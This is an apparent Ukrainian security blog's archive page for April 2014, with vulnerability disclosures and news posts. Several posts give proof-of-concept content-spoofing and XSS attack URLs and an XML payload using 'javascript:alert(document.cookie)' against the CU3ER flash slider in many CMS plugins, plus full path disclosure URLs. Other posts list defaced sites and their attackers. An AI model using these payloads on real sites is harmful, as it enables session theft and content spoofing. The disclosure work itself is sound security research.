Архів за Квітень, 2014

Уразливості в численних плагінах з CU3ER для WordPress

23:56 19.04.2014

Раніше я писав про уразливості в CU3ER. Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних плагінах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Вчора я писав про wpCU3ER для WordPress. Флешка CU3ER також міститься в наступних плагінах для WordPress: NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager, Cu3er Slider та інших плагінах, в тому числі кастом плагінах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах плагінів (по замовчуванню) або в error_log.

http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php та в багатьох php-файлах в підпапках плагіна
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.php

Уразливі всі плагіни з флешкою CU3ER: NextGen Cu3er Gallery 0.1, Simple Cu3er 1.0.1, Cu3er Post Elements 0.5.1, Gallery Manager, Cu3er Slider та попередні версії цих плагінів.

Дев’ятий масовий взлом сайтів на сервері Delta-X

22:46 19.04.2014

З 24.03.2013 по 29.12.2013 та з 08.01.2014 по 17.04.2014 відбувся дев’ятий масовий взлом сайтів на сервері Delta-X, після восьмого взлому сайтів на сервері Delta-X. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний новий сервер компанії Delta-X. Взлом складався з багатьох окремих дефейсів. 20 сайтів були дефейснуті в 2013 році та 56 сайтів в 2014 році.

Всього було взломано 77 сайтів на сервері української компанії Delta-X (IP 91.222.136.250). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт www.yarmrda.gov.ua.

Дефейси по одному сайту булу проведені хакерами kwgdeface, SlimeDont, C37HUN, Your Nick, InFlaMeS, ChatLak, jhoker, kazmil Hacker, m05l3k, FAMUR, Cogniti0, kwgdeface, default, Moroccan Hassan, CeLLaTReiS, 5 сайтів хакером Hmei7, 16 сайтів хакером HighTech та 41 сайт хакером d3b~X.

Враховуючи велику кількість окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів.

Вийшов WordPress 3.8.2

20:31 19.04.2014

У квітні, 08.04.2014, вийшла нова версія WordPress 3.8.2. Разом з нею вийшла версія 3.7.2 з виправлення тих самих уразливостей.

WordPress 3.8.2 це багфікс та секюріті випуск нової 3.8 серії. В якому розробники виправили 9 багів та 5 уразливостей.

Серед виправлених уразливостей дві дірки та три “посилення безпеки”. Це підробка кукісів (authentication cookie forgery) та privilege escalation уразливість, що дозволяла користувачам з правами Contributor публікувати пости.

Серер посилень безпеки наступні: покращення pingbacks (виправлена уразливість, що дозволяла проводити DoS атаки через пінгбеки), виправлена SQL Injection в адмінці та виправлена XSS в бібліотеці Plupload, що постачається з WP.

Підміна SSL з’єднань в Mozilla NSS

17:26 19.04.2014

Виявлена можливість підміни SSL з’єднань в Mozilla Network Security Services (NSS).

Уразливі версії: Mozilla NSS 3.15.

Некоректна реалізація TLS False Start.

Уразливості в плагінах з CU3ER для WordPress, Joomla, SilverStripe і Plone

23:51 18.04.2014

26.11.2013

Раніше я писав про уразливості в CU3ER. У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в веб додатку CU3ER та численних плагінах. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2014

Флешка CU3ER міститься в wpCU3ER для WordPress, jCU3ER і Vinaora Cu3er 3D Slide-show для Joomla, cu3er-silverstripe-extension для SilverStripe, collective.cu3er для Plone та багатьох інших плагінах. І всі вони мають Content Spoofing та XSS уразливості.

Адреси флешки в різних плагінах:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
В старих версіях плагіна:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

Перші два плагіни використовують останню версію CU3ER, а три інші плагини використовують версію 0.9.2 (а також в старих версіях wp-cu3er).

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі всі плагіни з флешкою CU3ER: wpCU3ER 0.75, jCU3ER 0.12, Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1, cu3er-silverstripe-extension, collective.cu3er 0.1 та попередні версії цих плагінів.

Проблеми з витоками персональних даних в Україні

22:44 18.04.2014

В Україні вже давно мають місце проблеми з витоками персональних даних. Про це я писав на протязі багатьох років і кожен українець, хто отримував дзвінки чи смски рекламного характеру (по стаціонарному чи мобільному телефону), стикався з цим. Витоки емайл адрес з розсиланням спаму також трапляються регулярно.

В тому числі я писав про витоки баз даних персональних даних українців. Як то база телефонних номерів Укртелекому, що з початку 2000-х продається на дисках на Радіоринку, Петровці та інших місцях продажу піратських дисків, і витік даних з бази “Служба 109″ Укртелекому на їхньому сайті. А також витоки інформації на різних сайтах - як я зазначав, такі витоки допускають ПриватБанк та деякі інші компанії.

Таким чином вже друге десятиліття в Україні має місце проблема з захистом персональних даних громадян. І поки що вона не вирішується. Незважаючи на те, що в 2011 році була створена Державна служби України з питань захисту персональних даних.

Про уразливості на сайті цієї служби zpd.gov.ua я вже писав. Вони не слідкують за безпекою власного сайту (який може бути взломаним і можуть бути вкрадені персональні дані, що на ньому зберігаються), ігнорують мої повідомлення про уразливості і не виправляють їх. Як і не займаються безпосередньо своєю роботою - захистом персональних даних. Що добре видно зі всіх цих кричущих випадків витоків персональних даних, якими переповнений Уанет і на які вони закривають очі.

Тобто ця служба лише зроблена для відводу очей, щоб зробити вигляд, що влада бореться з порушеннями в сфері персональних даних, але насправді служба нічого не робить. І скоріше за все за всі ці роки вона лише проїдала державні кошти без жодної користі для держави. Ось яскравий приклад роботи цієї служби.

В 2012 році відбувся витік бази даних сайта solor.da-kyiv.gov.ua, в якій містилися персональні дані. А в Уанеті окрім навмисних витоків трапляються і взломи сайтів з викраденням персональних даних (які в подальшому можуть бути розміщені в Інтернеті). Так ця служба не відреагувала на даний інцидент, навіть після мого листа з повідомленням про цей випадок. Їм байдуже, що відбуваються витоки персональних даних українців, їм аби фінансування виділялося, а там хоч трава не рости.

Враховуючи, що в останній час ведуться розмови про люстрацію, то я раджу обов’язково люструвати Державну служби України з питань захисту персональних даних. Усю службу: від керівництва до останнього працівника. Щоб вони несли відповідальність за марне проїдання державних коштів і не виконання своїх обов’язків.

P.S.

Після написання цієї статті трапився інцидент з передвиборчими витоками персональних даних.

Похакані сайти №259

20:09 18.04.2014

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.scourt.gov.ua (хакером fr0g) - 04.09.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://svitanok.gov.ua (хакером d3b~X) - 11.03.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://vesti.ua (хакерами з PATRIOTS) - 16.04.2014, зараз сайт вже виправлений адмінами
  • http://viknari.com.ua (хакером redspy)
  • http://troyanda.kr.ua (хакерами з Iran Security Team) - 15.04.2014, зараз сайт не працює (відключений провайдером через його взлом)

Добірка уразливостей

17:22 18.04.2014

В даній добірці уразливості в веб додатках:

  • HP LoadRunner, Remote Code Execution and Denial of Service (DoS) (деталі)
  • LiveZilla 5.1.1.0 Stored XSS in operator clients (деталі)
  • FlashCanvas 1.5 proxy.php XSS Vulnerability (деталі)
  • Vtiger 5.4.0 Reflected Cross Site Scripting (деталі)
  • Samsung TV - DoS vulnerability (деталі)

Уразливості в CU3ER

23:57 17.04.2014

22.11.2013

У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в CU3ER. Це 3D слайдер зображень на флеші. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

17.04.2014

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі CU3ER 1.24 та попередні версії.

Вийшли PHP 5.4.27 і PHP 5.5.11

22:48 17.04.2014

Нещодавно, 2 і 3 квітня, вийшли PHP 5.5.11 і PHP 5.4.27 відповідно. У версії 5.5.11 виправлено декілька багів і одна уразливість, а у версії 5.4.27 виправлено 5 багів і одна уразливість. Дані релізи направлені на покращення безпеки та стабільності гілок 5.4.x і 5.5.x.

У PHP 5.4.27 і PHP 5.5.11 виправлено:

  • Уразливість CVE-2013-7345.

По матеріалам http://www.php.net.